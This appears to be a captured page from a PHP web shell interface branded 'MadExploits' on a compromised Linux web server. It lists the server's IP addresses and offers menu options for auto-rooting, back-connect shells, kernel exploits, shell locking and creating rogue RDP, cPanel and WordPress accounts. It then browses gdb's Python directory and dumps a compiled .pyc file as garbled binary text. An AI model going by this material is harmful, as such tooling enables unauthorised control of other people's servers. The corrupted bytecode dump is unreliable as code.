Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
FrameDecorator.cpython-310.pyc
7.14
KB
-rw-r--r--
FrameIterator.cpython-310.pyc
1.2
KB
-rw-r--r--
__init__.cpython-310.pyc
5.77
KB
-rw-r--r--
frames.cpython-310.pyc
5.32
KB
-rw-r--r--
printing.cpython-310.pyc
8.63
KB
-rw-r--r--
prompt.cpython-310.pyc
3.36
KB
-rw-r--r--
types.cpython-310.pyc
4.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types.cpython-310.pyc
o ̴6b� � @ s` d Z ddlZdd� Zdd� Zdd� Zd d � ZG dd� de�Zd d� Zdd� Z dd� Z dd� ZdS )z%Utilities for working with gdb.Types.� Nc C sz | j tjks| j tjks| j tjkr9| j tjks| j tjkr#| �� } n| �� } | j tjks| j tjks| j tjks| �� S )z�Return the "basic" type of a type. Arguments: type_: The type to reduce to its basic type. Returns: type_ with const/volatile is stripped away, and typedefs/references converted to the underlying type. )�code�gdb� TYPE_CODE_REF�TYPE_CODE_RVALUE_REF�TYPE_CODE_TYPEDEF�target�strip_typedefs�unqualified)�type_� r �"/usr/share/gdb/python/gdb/types.py�get_basic_type s �r c C sd t | �} | jtjkr| jtjkrtd��| �� D ]}|jr't|j |�r& dS q|j |kr/ dS qdS )ay Return True if a type has the specified field. Arguments: type_: The type to examine. It must be one of gdb.TYPE_CODE_STRUCT, gdb.TYPE_CODE_UNION. field: The name of the field to look up. Returns: True if the field is present either in type_ or any baseclass. Raises: TypeError: The type is not a struct or union. znot a struct or unionTF)r r r �TYPE_CODE_STRUCT�TYPE_CODE_UNION� TypeError�fields� is_base_class� has_field�type�name)r �field�fr r r r - s � �r c C s6 | j tjkr td��i }| �� D ]}|j||j<